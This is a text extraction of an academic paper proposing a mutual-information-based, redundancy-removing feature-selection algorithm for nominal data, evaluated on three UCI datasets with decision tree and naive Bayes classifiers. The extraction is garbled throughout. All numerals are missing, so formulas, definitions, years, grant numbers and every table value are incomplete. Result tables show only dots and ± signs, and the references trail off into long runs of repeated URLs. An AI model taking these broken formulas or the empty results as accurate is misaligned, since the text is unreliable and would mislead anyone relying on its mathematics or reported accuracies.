information-related definitions and the corresponding computational methods, the proposed method can compute the information-related amount of nominal data directly. furthermore, by creating a new evaluation function that considers both the relevance and the redundancy globally, the new feature selection method can evaluate the importance of each nominal-data feature. although the presented feature selection method takes commonly used mifs-like forms, it is capable of handling high-dimensional datasets without expensive computations. we perform extensive experimental comparisons of the proposed algorithm and other methods using three benchmarking nominal datasets with two different classifiers. the experimental results demonstrate the average advantage of the presented algorithm over the well-known nmifs algorithm in terms of the feature selection and classification accuracy, which indicates that the proposed method has a promising performance. subjects data mining and machine learning, data science keywords nominal data, feature selection, redundancy-removing, mutual information introduction there are two main feature reduction approaches in data analysis, feature extraction and feature selection (jain, duin & mao, ). feature extraction aims at creating new features that are based on transformations or combinations of the raw feature set, and feature selection means selecting one group of the most efficient features from a certain dataset according to certain evaluations that are based on the goodness of a feature, with the purpose of decreasing the feature dimensionality (jain, duin & mao, ; tesmer & estévez, ; john, kohavi & pfleger, ). this approach is one of the major methods how to cite this article li and gu ( ), a redundancy-removing feature selection algorithm for nominal data. peerj comput. sci. :e ; doi . /peerj-cs. mailto:zhli@jiangnan.edu.cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. of feature reduction for high-dimensional data. the evaluation basis includes (tesmer & estévez, ) various distance measurements (kira & rendel, ), a dependency measurement (modrzejejew, ), a consistency measurement (almuallim & dietterich, ), a probability density measurement (battiti, ), a rough set measurement (hu, xie & yu, ), an information measurement (kwak & ch, ; kwak & choi, ; torkkola, ) and some other derivations such as based on optimization strategies (hou, nie & li, ). regardless of which evaluation basis is taken, the goal is to keep the number of selected features as small as possible, to avoid increasing the computational cost of the learning algorithm as well as the classifier complexity (tesmer & estévez, ). there have been numerous studies in the literature about various feature selection algorithms that depend on different evaluation bases. among them, the information theory-based feature selection algorithm that operates with respect to the selected features and raw dataset can involve less work while processing the data after the optimization transformation and the maximization of the mutual information (mi) between class labels. the mutual information-based feature selection mifs (battiti, ) algorithm is based on this basis, which utilizes greedy selection to guarantee that candidate features of the evaluation function can satisfy the final effective features. after studying the cases of unbalance of the evaluation function in the mifs algorithm, the mifs-u (kwak & choi, ) algorithm was proposed. the adaptive feature selection criterion was studied, and then the amifs (tesmer & estévez, ) algorithm was presented to cater to feature selection in high-dimensional data. considering the max-dependency and min-redundancy as a whole, the mrmr (peng, long & ding, ) algorithm was given. by reconstructing the evaluation function, the nmifs (estévez, tesmer & perez, ) algorithm was then proposed. both the mrmr and nmifs algorithms can distinctly decrease the redundancy in the selected features. however, these algorithms also have their disadvantages. for example, mifs (battiti, ) and mifs-u (kwak & choi, ) fail to consider the mutual information between the candidate features with selected subsets and class labels as well as the influences of the classification results. according to the aforementioned algorithms, their approximation computing of mi can perform only continuous-attributed data. nominal data exist in a broad range of practical applications. this kind of data is typically characterized by having no order information, being discrete, and having semantics (chow, wang & ma, ). no similarity metric or order correlation (chow, wang & ma, ; tang & mao, ; minho & ramakrishna, ) exists in nominal data. the “distance” in pattern recognition is hard to identify in it, which makes the measurement of the similarity or dissimilarity difficult. given the existing characteristics of nominal data, some problems in the feature selection appear. due to having non-order information and discrete and non-metric data distributions, the features of different classes even intersect with one another (chow, wang & ma, ; li, yang & gu, ; minho & ramakrishna, ). thus, most well-known feature selection algorithms are unsuitable for nominal-data feature selection or nominal-data feature extraction. li and gu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. considering the above disadvantages specifically and aiming at the nominal-data feature selection and its specificity, this paper presents the new scheme of mi-based more relevance less redundancy (mrlr) through the redefinition of the features’ information amounts, the relevance degree between the features and the conditional mi as well as re-construction of the corresponding new approximation computation method for mi with respect to nominal data. on the other hand, through studying the evaluation function and specifically the insufficient consideration of redundancy between features in most evaluation functions, this paper also creates a new evaluation function for nominal data. the new evaluation function not only considers the correlation between features and class labels but also accounts for the mutual correlation between features. in this way, the computation of mi for nominal-data features can be solved, and at the same time, an overly high redundancy of the selected subset caused by the redundant features can also be overcome. combining the innovations together into a new method, the redundancy-removing mrlr redremovingmrlr algorithm is proposed. several experiments were arranged. a total of three benchmarking nominal datasets are employed to compare the effectiveness and the efficiency by the naive bayes classifier and the decision tree classifier on the selected subsets of redremovingmrlr, mrlr (gu & li, ) and nmifs algorithm. the experimental results show that the newly proposed scheme can deliver promising results. the remainder of this paper is organized as follows. the related work and the new definitions are introduced in ‘notation and related studies.’ in ‘the proposed algorithms,’ we derive the framework of the proposed feature selection algorithm redremovingmrlr. promising experimental results on benchmarking datasets are presented in ‘results and discussion,’ which are followed by the concluding remarks in ‘conclusions.’ notation and related studies the related studies are introduced in ‘related work,’ and some new definitions and necessary terminology are presented in ‘notation and definitions.’ related work in this paper, we also use mi, which addresses taking the mi as a matrix of relevance and re- dundancy among the features, to study the nominal-data feature selection methods. some of the literature about feature selection methods that are based on mi have been issued, and references (tesmer & estévez, ; battiti, ; kwak & choi, ; peng, long & ding, ; estévez, tesmer & perez, ; chow, wang & ma, ) are benchmarks. mifs (battiti, ) selects the features that maximize the information about the classes, which are corrected by subtracting a quantity that is proportional to the average mi of the previously selected features. when there are many irrelevant and redundant features, the performance of mifs degrades because it penalizes too much redundancy. mifs-u (kwak & choi, ) proposed an enhancement of the mifs algorithm that makes a better estimation of the mi between the input features and output classes. however, although mifs-u is usually better than mifs, its performance also degrades in the presence of many irrelevant and redundant features (estévez, tesmer & perez, ). li and gu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. amifs (tesmer & estévez, ) presents an enhancement of mifs and mifs-u that overcomes their limitations in high-dimensional feature selection. an adaptive selection criterion is proposed in such a way that the trade-off between discarding the redundancy or irrelevance is adaptively controlled (estévez, tesmer & perez, ), which eliminates the need for a user-predefined parameter, i.e., a fixed parameter. by deriving an equivalent form called the minimal-redundancy-maximal-relevance criterion, for first-order incremental feature selection, mrmr (peng, long & ding, ) proposes a framework to minimize the redundancy and uses a series of intuitive measures of relevance and redundancy to select the most promising features. the mrmr algorithm combines other wrapper feature selection methods to select good features first according to the maximal statistical dependency criterion based on mi. it can select promising features for both continuous and discrete datasets (peng, long & ding, ; estévez, tesmer & perez, ). nmifs (estévez, tesmer & perez, ) takes the average normalized mi as a measure of the redundancy among the features (tesmer & estévez, ); it is also an enhancement of the mifs, mifs-u, and mrmr methods. nmifs outperforms the mifs, mifs-u, and mrmr methods without requiring a predefined parameter. however, ufsn (chow, wang & ma, ) can directly handle the nominal-data feature selection and overcome the shortcomings of converting data from nominal into binary. nevertheless, ufsn must depend on the cluster algorithm at the beginning, and it has a high complexity for large datasets during the process of clustering. this paper focuses on three issues that have not been covered in earlier work and highlights them as follows. first, by rewriting the evaluation function in nmifs (estévez, tesmer & perez, ); thus, the new presented algorithm gives a stronger penalty factor to the redundancy than that in nmifs. second, the new algorithm considers the redundancy and relevance of the features as a whole, which the nmifs does not. the new proposed algorithm also realizes less redundancy and more relevance regardless of the relationships between the features, as well as between the features and the class labels. third, by aiming at the feature selection for nominal data by mi measurement and simplifying the computation of mi between the features of nominal data, several new definitions are given.the experimental results show that the redremovingmrlr algorithm is effective in nominal-data feature selection. notation and definitions to realize the nominal-data feature selection efficiently, several new definitions and the corresponding computing methods for them are first given, as follows: definition given n values of the ith feature fi, i.e., {a ,a ,...,an} ∈ fi, then the information amount of fi can be expressed as i( fi) =− n i= pilog (pi) ( ) where pi represents the frequency of each value in fi, namely, pi = ai |fi| . li and gu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. definition conditional mutual information between two different features fi and fj can be expressed as e( fi;fj) =− m j= pji( f ij) ( ) where e(fi;fj) represents the dependence degree of the ith feature fi on the jth feature fj, where fj is determined. here, m denotes the number of values in fj. definition according to the above definition, the relevance degree between fi and fj can be expressed as g( fi;fj) = i( fi)−e( fj;fi) = i( fj)−e( fi;fj). ( ) it can be obtained that the relevance degree between fi and fj satisfies symmetry. i(fi) can be obtained by formula ( ), and e(fj;fi) can be obtained by formula ( ). definition the preliminary evaluation function of the feature selection for nominal data on each fi can be expressed as j( fi) = g(s∪ fi;c)−  |s|  fs∈s g( fs;fi) ( ) where g(s ∪ fi;c) represents the relevance degree between the class labels c and the selected subset s after being added to the candidate feature fi. similarly, the penalty factor β is a user-predefined parameter in mifs and mifs-u, and it is difficult to determine. to overcome this limitation, this paper here replaces it with /|s|. the proposed algorithms considering the specificity of nominal-data feature selection, this paper performs the following research: basic idea of the algorithms based on the above, the algorithm should select the features via a maximum mi with class labels. more concretely, the algorithm should also consider the mi between different features to avoid overlarge feature redundancy. in this way, the uncertainty of the other features can be determined to the maximum extent. this feature selection algorithm first chose the feature that had the largest relevance to the class labels. then, the relevance degrees between the candidate feature and the selected features as well as the class labels are computed. finally, the feature that has more relevance to the class label and less redundancy with the selected features is selected. after several iterations, the selected subset that satisfies the conditions can be obtained. li and gu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. redundancy-removing feature selection algorithm inspired by nmifs (estévez, tesmer & perez, ), the mi between the candidate feature fi in the dataset and the selected feature fs in subset s is shown in formula ( ). mi( fi;fs) = h( fi)−h( fi|fs) = h( fs)−h( fs|fi) ( ) where h(fi) and h(fs) represent the entropy of the feature. h( fi|fs) and h( fs|fi) represent the corresponding conditional entropies. from formula ( ), it can be known that formula ( ) is satisfied. ≤ mi( fi,fs) ≤ min{h( fi),h( fs)}. ( ) furthermore, the concept of a redundancy evaluation operator (peng, long & ding, ; estévez, tesmer & perez, ) is introduced here and is shown in formula ( ). this approach aims to evaluate the redundancy degree between the features fs. nmi( fi;fs) = mi( fi;fs) min{h( fi),h( fs)} ( ) where in formula ( ), it can be known that nmi(fi;fs) ∈[ , ]. when nmi(fi;fs) = , the two features are mutually independent, whereas nmi(fi;fs) = means that there is great redundancy between the candidate feature fi and the selected features. on the basis of mifs (battiti, ), nmifs (estévez, tesmer & perez, ) evolved a new strategy of a redundancy matrix operator for the evaluation function for feature selection and then proposed the nmifs algorithm (estévez, tesmer & perez, ), which selected the candidate feature fi with a maximum evaluation function value as the preferred feature and added it into the selected subset s. the greatest contribution of the nmifs algorithm is that it addresses automatically preventing the feature that has more redundancy with the selected subset in the selection process (estévez, tesmer & perez, ). however, the nmifs algorithm can adapt only to continuous-attributed data instead of nominal data. therefore, inspired by the redundancy-removing idea in nmifs algorithm, formula ( ) is modified into formula ( ). j( fi) = g(s∪ fi;c)−  |s|  fs∈s g( fs;fi) min{h( fi),h( fs)} . ( ) it is clear that the redundancy between the candidate features and selected features is guided by formula ( ). thus, formula ( ) can always be used to evaluate whether the candidate feature can be finally selected; specifically, formula ( ) can be used as an evaluation function. if so, then, obviously, there are two distinct advantages: ( ) it is suitable for nominal data; and ( ) it can prevent features that have more redundancy from being selected. to illustrate the above second advantage, we assume an extreme case in which fi only has more redundancy with one of the features in subset s, whereas there is less redundancy or even non-redundancy with the other features. in this case, the value li and gu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. of  |s|  s∈s i( f;s) min{h( f ),h(s)} is less, and the candidate feature fi can be certainly selected into the subset s. the result enables the subset s to still have more redundancy. to overcome this extreme case, the following countermeasures are proposed. by adjusting the penalty factor in the evaluation function, for example, the second part in formula ( ) can be replaced with a stronger penalty factor, such as the second part of formula ( ). j( fi) = g(s∪ fi;c)−argmax  g( fs;fi) min{h( fi),h( fs)} ,fs ∈ s  . ( ) obviously, this extreme case can be overcome. based on the above, the redundancy- removing mrlr redremovingmrlr algorithmis summarized below. algorithm: algorithmredremovingmrlr step initialization: suppose f is the universal set with all features, and s is the empty set; initialize the value of k, which represents the dimensional number of the feature subset that was selected by the feature selection algorithm; step compute the relevance degree according to formula ( ); for each feature fi ∈ f, compute g( fi;c); step according to the computational results in step , fi with the maximum relevance degree value g( fi;c) is selected, and f ← f −{f}, s ←{f}; step for each fi in the candidate features, compute the preliminary evaluation value by formula ( ). if the preliminary evaluation value of fi is less than or equal to the average, then compute the evaluation value of fi according to formula ( ), whereas if the preliminary evaluation value of fi is greater than the average, then compute the evaluation value of fi according to formula ( ); step successively, feature fi with the maximum evaluation value is selected as the next valid feature, and set f ← f −{fi}, s ←{fi}; step if |s|= k cannot be satisfied, then turn to step ; step output subset s. the determining process of k in redremovingmrlr is as follows. at the beginning, the algorithm computes r(f) |f| on the raw dataset as the initialized number of k. while an inflection point appears for the classification accuracy of the redremovingmrlr algorithm on the selected subset s before and after being added to the next candidate feature, redremovingmrlr computes r(s) |s| . as long as r(s) |s| ≥ r(f) |f| is satisfied, the norm |s| is the value of k. specifically, k = |s|, and the |s| = k is the stopping condition of redremovingmrlr. here, r(x) is the classification accuracy of a certain employed classifier on a certain selected subset or dataset x. the time cost of the redremovingmrlr algorithm contains mainly two parts. one is the time to compute the relevance degree between the features; its time complexity can be noted as mnlog n. the other is the time to obtain the final k of the subset s, which requires k iterations. thus, its time complexity is kmnlog n, and the total time complexity of redremovingmrlr is o(mnlog n). at this point, the time complexity is the same as that in mifs and mifs-u, which clearly shows that the redremovingmrlr algorithm realizes the nominal-data feature selection without increasing the time complexity. however, the redremovingmrlr algorithm is not always the perfect approach. if the extreme feature fi is selected as the first feature in subset s, then it is inept at obtaining a li and gu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table the experimental benchmarking nominal datasets are employed in this manuscript. data set number of features number of patterns classes soybean vehicle krvs , prime result. basically, it can be seen that the new evaluation function in the algorithm has strong application flexibility. the redremovingmrlr algorithm also employs the methods in mifs (battiti, ) and reference (hu, xie & yu, ) to compute h(fi), h(fs) in related formulas. although the probability-equaling discretization processing is conducted on the continuous features, by summing the information entropy of each feature after discretization, mifs (battiti, ) and reference (hu, xie & yu, ) mainly focused on the feature selection of continuous-attributed data. because the nominal data are discrete, it is feasible to equivalently replace h(fi), h(fs) in formulas that have nominal features and to directly compute the information entropy. therefore, the formulas can be directly taken as the evaluation methods with respect to the redundancy between the candidate features and the selected nominal-data features. results and discussion experimental data sets in this section, experiments are performed on benchmarking nominal datasets (table ) from the uci machine learning repository (blake & merz, ). in each problem, all of the patterns that have missing feature values are initially removed. the dataset king-rook vs. king-pawn is represented as krvs briefly. experimental results in this section, we arrange two experiments to test the feature selection performance, removing the redundancy capability and robust capability of redremovingmrlr for nominal data. the decision tree classifier (brodley & utgoff, ) and the naive bayes classifier (liu, ) are employed to evaluate the nominal data subsets. a comparative study between different algorithms is also performed in terms of the indexes for three aspects, namely, ( ) the number of final selected features; ( ) the classification accuracy of the selected feature subset using different employed classifiers; and ( ) the performance of the classification model that is created for different classifiers and both the feature selection complexity and feature classification accuracy. based on the selected feature subset using the compared algorithms, candidate features are added one by one until the entire raw data set is addressed, and the classification experiment is conducted to evaluate the performance of the algorithm. for nmifs, the best parameter is selected. li and gu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table the selected subsets by redundancy-removing mrlr, mrlr and nmifs algorithm respectively. dataset fullset mrlr nmifs redremovingmrlr soybean vehicle krvs table the classification accuracy on the different subsets from the table by the decision tree classifier. dataset nmifs (%) mrlr (%) redremoving mrlr (%) soybean . ± . . ± . . ± . vehicle . ± . . ± . . ± . krvs . ± . . ± . . ± . table the classification accuracy on the different subsets from the table by the naive bayes classifier. dataset nmifs (%) mrlr (%) redremoving mrlr (%) soybean . ± . . ± . . ± . vehicle . ± . . ± . . ± . krvs . ± . . ± . . ± . experiment . this experiment aims to quantitatively evaluate the applicability and effectiveness of redremovingmrlr, and a comparative study among redremovingmrlr, mrlr and the classical nmifs is also performed. here, several high-dimensional datasets (table ) that have redundancy features (chow, wang & ma, ; tang & mao, ; li, yang & gu, ; chert & yang, ) in uci (blake & merz, ) are employed to evaluate the feature selection capability of the redremovingmrlr, mrlr and nmifs algorithm as well as the naive bayes classifier and decision tree classifier, which are used to test the effectiveness of the selected subset from the different algorithms. this experiment illustrates the performance of redremovingmrlr, mrlr and nmifs for redundant-featured datasets. the experimental results are listed in tables , and . table lists the final selected feature subsets from the redremovingmrlr, mrlr and nmifs algorithms. the results show that the redremovingmrlr, nmifs and mrlr algorithms have higher feature-selecting capabilities for high-dimensional, redundant-featured datasets. in the results, we obtain nine new subsets, yi,yi ⊂ {y ,y ,...,y },i ∈ [ , ], which correspond to the redremovingmrlr, mrlr and nmifs algorithms, respectively. here, we call them basic feature selected subsets to describe in context. however, on the vehicle dataset for the feature selection by the redremovingmrlr algorithm, the final subset is one dimension more than that from the li and gu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. mrlr algorithm. however, on the whole, table actually illustrates that the performance of redremovingmrlr is superior to mrlr and nmifs in terms of its feature-selecting capability. table lists the final classification accuracies that were obtained by the decision tree classifier on the nine basic feature selected subsets above. table lists the final classification accuracies from the naive bayes classifier on the nine basic feature selected subsets above. for tables and , to make the comparative study fair, an average value over sets of classification results is taken as the estimation value of the classification accuracy, and the -fold cross-validation method on them is taken as well as repeated times. from table , for the decision tree classifier, the classification accuracy of the redremov- ingmrlr algorithm on the different basic subsets is the best among the three compared algorithms. redremovingmrlr demonstrates its advantage over the mrlr and nmifs algorithms in terms of its feature-selecting capability and effectiveness. furthermore, the results show that the decision tree classifier is appropriate for classifying the nominal data. for the naive bayes classifier, the classification accuracy of redremovingmrlr on the krvs’s subset is higher than that of the other two compared algorithms. the main reason is that there exists not only redundancy but strong relevance between the features of the krvs dataset (tang & mao, ; tang & mao, ). additionally, the classification accuracy of redremovingmrlr on the soybean subset is lower than that of the other two compared algorithms, whereas for the vehicle, it is higher than that of the nmifs algorithm and lower than that of the mrlr algorithm. from the analysis, we find that the main reason for these distinct differences is the classifying principle that is implemented in the classifiers, namely, the different theorems that form the bases for the different classifiers. the decision tree classifier primarily operates through the selection of classification features based on the acquired information, such as selecting one or a couple of key features as the rooting key node randomly; then, it classifies the data items into different classes along the tree clues that exist in the dataset. moreover, each feature in the selected subsets is absolutely independent, and which one acts as the rooted node in the tree should not affect the final classification results. the more independent the selected features are, the less influence they have on the classification results. on the other hand, the naive bayes classifier classifies the data items according to the different probability densities of the values of the different features. however, before or after the features are selected, the probability density of the features is varied not only in the raw dataset but also in the selected subset. thus, the classification results are diverse. as a result, the difference in the results is due to the different classifying principles in the different classifiers rather than in the classification mechanism. therefore, the results show that two cases are involved: ( ) the specificity of the non-matrix characteristic, disorderliness characteristic, and disparity characteristic in the nominal data; and ( ) the decision tree classifier is more suitable for classifying the nominal data. li and gu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. experiment . this experiment aims to evaluate the efficiency and robust capability of redremovingmrlr, and a comparative study among redremovingmrlr, mrlr and the classical nmifs is also performed. the same datasets as in experiment , i.e., yi,i ∈[ , ], are the subject of experimentation. here, the experimental examples of each time are generated from one of the basic feature-selected subsets (in experiment ) by adding up one-dimensional features one by one individually, according to the descending order of the values of the evaluation function found in formulas ( ) or ( ). in this case, a series of new temporary subsets are formed after one of the features is added at each time. to describe clearly the context, we call them temporary subsets. for each temporary subset, the decision tree classifier and naive bayes classifier are employed to train, and thus, the two classification results are obtained at each step until all of the features add up completely. the experimental results are shown in figs. – . furthermore, to make the comparative study fair, the average value of instances of classification results is taken as the estimated value for the classification accuracy, and the -fold cross-validation method on each temporary subset for each algorithm is adopted. figures a and b shows the classification results on the soybean dataset by the decision tree classifier and the naive bayes classifier, respectively. the decision tree classifier and the naive bayes classifier all approximately achieve the highest classification accuracy at the beginning of the basic selected subset without adding any other features. from these figures, we can readily see that redremovingmrlr has the best classification accuracies in most of the cases and is comparatively competitive to nmifs and/or mrlr even when re- dremovingmrlr cannot achieve the best classification results. the classification accuracy of redremovingmrlr always retains stability. this fact indeed indicates the advantage of redremovingmrlr over nmifs and mrlr in its robust capability, in an average sense, and shows that redremovingmrlr has the resistance capability for outer interference. figure a shows the generalization accuracy of the decision tree classifier that uses as inputs the temporary subsets of features selected by redremovingmrlr, nmifs, mrlr. it can be seen that the best results are obtained with redremovingmrlr for or more features. each algorithm achieved its best classification accuracy near the number of the basic selected subsets. redremovingmrlr outperforms nmifs and mrlr for any number of features. figure b shows that the generalization accuracy of the naive bayes classifier for the redremovingmrlr, nmifs, mrlr algorithms. mrlr outperforms nmifs and redremovingmrlr for any number of features. obviously, fig. demonstrates the whole change curves on the vehicle dataset for three algorithms with the two classifiers. it can be easily seen that the variation tendency of the classification accuracy is the same or similar. after reaching the full set, the classification accuracy of the different classifiers is the same. from these experimental results, we find that ( ) redremovingm- rlr, mrlr, nmifs all have redundancy-distinguishing capabilities; ( ) the theorem basis of the classifiers certainly affects the classification results, but the affected level is limited; and ( ) little interdependency exists in the vehicle dataset besides the redundancy. figure shows the best results that are obtained for the number of basic feature selected subsets with each compared algorithm. for the two classifiers, the classification results li and gu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure image of generalization classifier accuracy on soybean by different classifiers. the general- ization classifier accuracy on soybean by different classifiers. (a) shows the accuracy results on soybean by decision tree classifier; (b) shows the accuracy results on soybean by naive bayes classifier. using the features selected by redremovingmrlr are even better than those using the entire dataset. figure a shows that the changing trend of the classification accuracy by redremovingmrlr is similar to that of the mrlr algorithm, and it retains a relative height classification rate. although nmifs has a better behavior for less than ten features at the beginning, it also has relatively better classification rates after the ten features. in the interval from to features, while selecting some irrelevant or redundant features earlier than the relevant ones, the nmifs has a bad performance. figure b shows that the li and gu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure image of the generalization classifier accuracy on vehicle by different classifiers. the gener- alization classifier accuracy on vehicle by different classifiers. (a) shows the accuracy results on vehicle by decision tree classifier; (b) shows the accuracy results on vehicle by naive bayes classifier. variation trend of the classification accuracy by the three compared algorithms is similar. on the whole, they are in the desired descending order. after features, the classification accuracy by the nmifs algorithm is far lower than that of the other compared algorithms; this situation indicates that the performance of nmifs is influenced by the selection order of the relevant features, redundant features and irrelevant features. on the whole, from tables , and and figs. – , besides some wavering variation that exists in fig. b on the krvs dataset by the naive bayes classifier for the redremovingmrlr algorithm, redremovingmrlr outperforms mrlr and nmifs with and without li and gu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure image of the generalization classifier accuracy on krvs by different classifiers. the generaliza- tion classifier accuracy on krvs by different classifiers. (a) shows the accuracy results on krvs by decision tree classifier; (b) shows the accuracy results on krvs by naive bayes classifier. mutations, finding the best solution with a smaller number of features. the classification accuracy using the features that are selected by redremovingmrlr are even better than those using the entire dataset. from these experimental results, we find that ( ) redremov- ingmrlr always selects all of the features that are in the ideal selection order: first, the relevant features in the desired descending order, second, the redundant features, and last, the irrelevant features, rather than using the converse order. in some krvs-like datasets, both mrlr and nmifs selected some irrelevant features earlier than the redundant features because they penalize too much the redundancy; ( ) the experimental results li and gu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. here indicate that redremovingmrlr can be applied effectively to nominal data sets with high-dimensional features and has a relatively stronger redundancy-recognizing capability; and ( ) the feature selection strategy utilized in redremovingmrlr is practicability, and the redundancy matrix operator is expressed as formula ( ) and its modification in formula ( ) and formula ( ) make it robust. conclusions in this paper, the novel algorithm redremovingmrlr, which is a method that aims to select features for nominal data, is proposed. the virtues of the proposed algorithm can be summarized as follows: ( ) by forming several new information-related definitions for nominal data, such as the information amount, conditional mutual information, and relevance degree, a series of corresponding improvements in their computation methods are presented. with these, the redremovingmrlr algorithm takes commonly used mifs-like forms, which enhances its feature selection performance and effectiveness; ( ) a reasonable evaluation function of feature selection deems the proposed algorithms to be fit to select the features from the nominal data. however, the computational complexity does not increase, and the feature selection for the nominal data becomes easier; ( ) by considering the relevance and redundancy globally and rewriting the evaluation function that is in nmifs (estévez, tesmer & perez, ) and then employed by redremovingm- rlr, its redundancy-removing capability and robust capability are enhanced; ( ) our experimental results demonstrate the average advantage of redremovingmrlr over the algorithms mrlr and nmifs in terms of the size of the feature selection subset, the feature efficiency and the classification accuracy. improvements on these proposed methods will require further study. an estimation method for mi for nominal data should be developed in the future rather than employing methods from others. the feature selection capability for nominal data with noisy and mixed features as well as the improvement on the corresponding algorithms will be investigated in succeeding studies. additional information and declarations funding this work is supported by the future research projects funds for the science and tech- nology department of jiangsu province (grant no. by - ) and the fundamental research funds for the ministry of education (grant no. jusrp a ).the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: science and technology department of jiangsu province: by - . fundamental research funds for the ministry of education: jusrp a . li and gu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. competing interests the authors declare there are no competing interests. author contributions • zhihua li contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. • wenqu gu conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work. data availability the following information was supplied regarding data availability: uci repository of machine learning database http://www.ics.uci.edu/∼mlearn/mlrepository. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information. references almuallim h, dietterich tg. . learning with many irrelevant features. in: proceedings of the th national conference on artificial intelligence. palo alto: aaai press, – . battiti r. . using mutual information for selecting features in supervised neural net learning. ieee transactions on neural networks ( ): – doi . / . . blake c, merz c. . uci repository of machine learning database [eb/ol]. available at http:// www.ics.uci.edu/∼mlearn/mlrepository. brodley ce, utgoff pe. . multivariate decision trees. machine learning ( ): – . chert j, yang z. . an incremental clustering with attribute unbalance considered for categorical data. computational intelligence and intelligent systems. in: th international symposium, isica huangshi, china. berlin, heidelberg: springer, – . chow tws, wang p, ma ewm. . a new feature selection scheme using a data distribution factor for unwupervised nominal data. ieee transaction on system ( ): – doi . /tsmcb. . . estévez pa, tesmer sm, perez ca et al. . normalized mutualinformation feature selection. iieee transactions on neural networks ( ): – doi . /tnn. . . gu w, li z. . mutual information-based feature selection algorithm for nominal data, computer engineering and applications, online. available at http://jsgg.chinajournal.net.cn/ wkc/webpublication/paperdigest.aspx. hou c, nie f, li x et al. . joint embedding learning and sparse regression: a framework for unsupervised feature selection. ieee transactions on cybernetics ( ): – doi . /tcyb. . . hu q, xie z, yu d. . hybrid attribute reduction based on a novel fuzzy rough modeland infor- mation granulation. pattern recognition ( ): – doi . /j.patcog. . . . jain ak, duin rpw, mao j. . statistical pattern recognition: a review. ieee transactions on pattern analysis and machine intelligence : – doi . / . . li and gu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information 